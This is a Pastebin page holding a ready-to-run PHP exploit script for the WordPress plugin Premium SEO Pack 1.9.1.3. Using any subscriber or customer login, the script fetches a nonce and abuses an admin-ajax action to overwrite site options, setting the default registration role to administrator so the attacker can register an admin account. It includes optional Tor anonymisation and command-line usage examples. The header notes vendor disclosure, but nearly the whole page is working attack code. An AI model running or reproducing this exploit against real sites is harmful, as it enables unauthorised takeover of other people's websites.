API tools faq
paste
anoaghost

Wordpress Plugin Premium Seo Pack 1.9.1.3 Exploit

anoaghost
Jun 26th, 2016
383
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.27 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /**
  3. * Exploit Title: Premium SEO Pack Exploit
  4. * Google Dork:
  5. * Exploit Author: wp0Day.com <contact@wp0day.com>
  6. * Vendor Homepage: http://aa-team.com/
  7. * Software Link: http://codecanyon.net/item/premium-seo-pack-wordpress-plugin/6109437?s_rank=2
  8. * Version: 1.9.1.3
  9. * Tested on: Debian 8, PHP 5.6.17-3
  10. * Type: Authenticated (customer, subscriber) wp_options overwrite
  11. * Time line: Found [05-Jun-2016], Vendor notified [05-Jun-2016], Vendor fixed: [???], [RD:1]
  12. */
  13.  
  14.  
  15. require_once('curl.php');
  16. //OR
  17. //include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
  18. $curl = new CurlWrapper();
  19.  
  20.  
  21. $options = getopt("t:m:u:p:a:",array('tor:'));
  22. echo "Current Options:\n";
  23. print_r($options);
  24. for($i=4;$i>0;$i--){
  25. echo "Starting in $i \r";
  26. sleep(1);
  27. }
  28. echo "Starting.... \r";
  29. echo "\n";
  30.  
  31. $options = validateInput($options);
  32.  
  33. if (!$options){
  34. showHelp();
  35. }
  36.  
  37. if ($options['tor'] === true)
  38. {
  39. echo " ### USING TOR ###\n";
  40. echo "Setting TOR Proxy...\n";
  41. $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
  42. $curl->addOption(CURLOPT_PROXYTYPE,7);
  43. echo "Checking IPv4 Address\n";
  44. $curl->get('https://dynamicdns.park-your-domain.com/getip');
  45. echo "Got IP : ".$curl->getResponse()."\n";
  46. echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
  47. $answer = fgets(fopen ("php://stdin","r"));
  48. if(trim($answer) != 'wololo'){
  49. die("Aborting!\n");
  50. }
  51. echo "OK...\n";
  52. }
  53.  
  54.  
  55. function logIn(){
  56. global $curl, $options;
  57. file_put_contents('cookies.txt',"\n");
  58. $curl->setCookieFile('cookies.txt');
  59. $curl->get($options['t']);
  60. $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
  61. $curl->post($options['t'].'/wp-login.php', $data);
  62. $status = $curl->getTransferInfo('http_code');
  63. if ($status !== 302){
  64. echo "Login probably failed, aborting...\n";
  65. echo "Login response saved to login.html.\n";
  66. die();
  67. }
  68. file_put_contents('login.html',$curl->getResponse());
  69. }
  70.  
  71. function exploit(){
  72. global $curl, $options;
  73. if ($options['m'] == 'admin_on') {
  74. echo "Setting default role on registration to Administrator\n";
  75. /* Getting a nonce */
  76. $data = array('action'=>'pspLoadSection', 'section'=>'setup_backup');
  77. $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
  78. $resp = $curl->getResponse();
  79. $resp = json_decode($resp,true);
  80. preg_match_all('~id="box_nonce" name="box_nonce" value="([a-f0-9]{10})"~', $resp['html'], $mat);
  81. if (!isset($mat[1])){
  82. die("Failed getting box_nonce\n");
  83. }
  84. $nonce = $mat[1][0];
  85. $new_settings = array('default_role'=>'administrator', 'users_can_register'=>1);
  86. $new_settings = urlencode(json_encode($new_settings));
  87. echo "Sending settings to update\n";
  88. $data = array('action'=>'pspInstallDefaultOptions', 'options'=>'box_id=psp_setup_box&box_nonce='.$nonce.'&install_box='.$new_settings);
  89. $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
  90. $resp = $curl->getResponse();
  91. $resp = json_decode($resp,true);
  92. if (@$resp['status'] == 'ok'){
  93. echo "Admin mode is ON, go ahead an register yourself an Admin account! \n";
  94. } else {
  95. echo "Setting admin mode failed \n";
  96. }
  97. echo "Raw response: " . $curl->getResponse() . "\n";
  98. }
  99. if ($options['m'] == 'admin_off') {
  100.  
  101. echo "Setting default role on registration to Subscriber\n";
  102. /* Getting a nonce */
  103. $data = array('action'=>'pspLoadSection', 'section'=>'setup_backup');
  104. $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
  105. $resp = $curl->getResponse();
  106. $resp = json_decode($resp,true);
  107. preg_match_all('~id="box_nonce" name="box_nonce" value="([a-f0-9]{10})"~', $resp['html'], $mat);
  108. if (!isset($mat[1])){
  109. die("Failed getting box_nonce\n");
  110. }
  111. $nonce = $mat[1][0];
  112. $new_settings = array('default_role'=>'subscriber', 'users_can_register'=>0);
  113. $new_settings = urlencode(json_encode($new_settings));
  114. echo "Sending settings to update\n";
  115. $data = array('action'=>'pspInstallDefaultOptions', 'options'=>'box_id=psp_setup_box&box_nonce='.$nonce.'&install_box='.$new_settings);
  116. $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
  117. $resp = $curl->getResponse();
  118. $resp = json_decode($resp,true);
  119. if (@$resp['status'] == 'ok'){
  120. echo "Admin mode is OFF \n";
  121. }
  122. echo "Raw response: " . $curl->getResponse() . "\n";
  123. }
  124. }
  125.  
  126.  
  127. logIn();
  128. exploit();
  129.  
  130.  
  131.  
  132. function validateInput($options){
  133.  
  134. if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
  135. return false;
  136. }
  137. if ( !isset($options['u']) ){
  138. return false;
  139. }
  140. if ( !isset($options['p']) ){
  141. return false;
  142. }
  143. if (!preg_match('~/$~',$options['t'])){
  144. $options['t'] = $options['t'].'/';
  145. }
  146. if (!isset($options['m']) || !in_array($options['m'], array('admin_on','admin_off') ) ){
  147. return false;
  148. }
  149. if ($options['m'] == 'tag' && !isset($options['a'])){
  150.  
  151. }
  152. $options['tor'] = isset($options['tor']);
  153.  
  154. return $options;
  155. }
  156.  
  157.  
  158. function showHelp(){
  159. global $argv;
  160. $help = <<<EOD
  161.  
  162. Premium SEO Pack Exploit
  163.  
  164. Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -m [MODE]
  165.  
  166. *** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" **
  167.  
  168. [MODE] admin_on - Sets default role on registration to Administrator
  169. admin_off - Sets default role on registration to Subscriber
  170.  
  171. Examples:
  172. php $argv[0] -t http://localhost/ --tor=yes -u customer1 -p password -m admin_on
  173. php $argv[0] -t http://localhost/ --tor=yes -u customer1 -p password -m admin_off
  174.  
  175. Misc:
  176. CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
  177. @link http://github.com/svyatov/CurlWrapper
  178. @license http://www.opensource.org/licenses/mit-license.html MIT License
  179.  
  180. EOD;
  181. echo $help."\n\n";
  182. die();
  183. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!